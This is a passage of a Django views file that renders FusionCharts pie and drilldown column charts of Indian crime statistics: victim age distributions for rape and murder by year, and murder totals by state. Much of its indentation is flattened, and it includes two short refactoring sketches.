sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2009(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2009
df = data[(data['Year'] == 2009)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
def pie2010(request):
data = pd.read_csv('20_Victims_of_rape.csv')
var1 = 2010
df = data[(data['Year'] == 2010)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Between_10to14_Yrs']),
sum(df['Victims_Between_14to18_Yrs']),
sum(df['Victims_Between_18to30_Yrs']),
sum(df['Victims_Between_30to50_Yrs']),
sum(df['Victims_Upto_10_Yrs'])
]
value = ['Victims_Above_50_Yrs','Victims_Between_10-14_Yrs','Victims_Between_14-18_Yrs','Victims_Between_18-30_Yrs','Victims_Between_30-50_Yrs','Victims_Upto_10_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Crimes Against women",
"theme": "zune"
}
dataSource['data'] = []
    # Iterate over the six age buckets and insert them into the `dataSource['data']` list.
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'women/pie2001.html', {'output' : pie3d.render(), 'var1':var1})
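# --- Hedged refactor sketch (not part of the original app) -----------------
# The pieYYYY views differ only in the year; they all render the shared
# 'women/pie2001.html' template with `var1` carrying the year. A single
# parameterized view (hypothetical name `pie_year`) could replace them,
# assuming the same CSV layout and working directory.
AGE_COLUMNS = ['Victims_Above_50_Yrs', 'Victims_Between_10to14_Yrs',
               'Victims_Between_14to18_Yrs', 'Victims_Between_18to30_Yrs',
               'Victims_Between_30to50_Yrs', 'Victims_Upto_10_Yrs']

def pie_year(request, year):
    data = pd.read_csv('20_Victims_of_rape.csv')
    df = data[data['Year'] == year]
    dataSource = {
        'chart': {"caption": "Analysis of the victims age distribution",
                  "subCaption": "Crimes Against women", "theme": "zune"},
        # Building labels and values from one column list keeps them aligned.
        'data': [{'label': col, 'value': float(df[col].sum())} for col in AGE_COLUMNS],
    }
    pie3d = FusionCharts("pie3d", "ex2", "100%", "500", "chart-1", "json", dataSource)
    return render(request, 'women/pie2001.html', {'output': pie3d.render(), 'var1': year})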
def murdpie2001(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2001
data = data.fillna(0)
df = data[(data['Year'] == 2001)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2002(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2002
data = data.fillna(0)
df = data[(data['Year'] == 2002)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2003(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2003
data = data.fillna(0)
df = data[(data['Year'] == 2003)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2004(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2004
data = data.fillna(0)
df = data[(data['Year'] == 2004)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2005(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2005
data = data.fillna(0)
df = data[(data['Year'] == 2005)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2006(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2006
data = data.fillna(0)
df = data[(data['Year'] == 2006)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2007(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2007
data = data.fillna(0)
df = data[(data['Year'] == 2007)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2008(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2008
data = data.fillna(0)
df = data[(data['Year'] == 2008)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2009(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2009
data = data.fillna(0)
df = data[(data['Year'] == 2009)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2010(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2010
data = data.fillna(0)
    df = data[(data['Year'] == 2010)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
    # Labels in the same order as the sums in `top` above.
    value = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs', 'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs', 'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
    # Return the complete JavaScript and HTML code used to render the chart in the browser.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
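# --- Hedged sketch (not part of the original views) -------------------------
# Deriving both labels and values from a single column list keeps them from
# drifting out of step, which is the failure mode the murdpie views above are
# prone to. `MURDER_AGE_COLUMNS` and `murder_age_data` are hypothetical names.
MURDER_AGE_COLUMNS = ['Victims_Above_50_Yrs', 'Victims_Upto_10_15_Yrs',
                      'Victims_Upto_10_Yrs', 'Victims_Upto_15_18_Yrs',
                      'Victims_Upto_18_30_Yrs', 'Victims_Upto_30_50_Yrs']

def murder_age_data(df):
    # Build the FusionCharts data list directly from the column names.
    return [{'label': col, 'value': float(df[col].sum())} for col in MURDER_AGE_COLUMNS]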
def murd2002(request):
dataSource = {}
var1 = 2002
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2002):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2002, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2003(request):
dataSource = {}
var1 = 2003
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2003):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2003, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2004(request):
dataSource = {}
var1 = 2004
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2004):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2004, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2005(request):
dataSource = {}
var1 = 2005
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2005):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2005, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2006(request):
dataSource = {}
var1 = 2006
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2006):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2006, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2007(request):
dataSource = {}
var1 = 2007
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2007):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2007, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2008(request):
dataSource = {}
var1 = 2008
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2008):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2008, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2009(request):
dataSource = {}
var1 = 2009
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2009):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2009, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
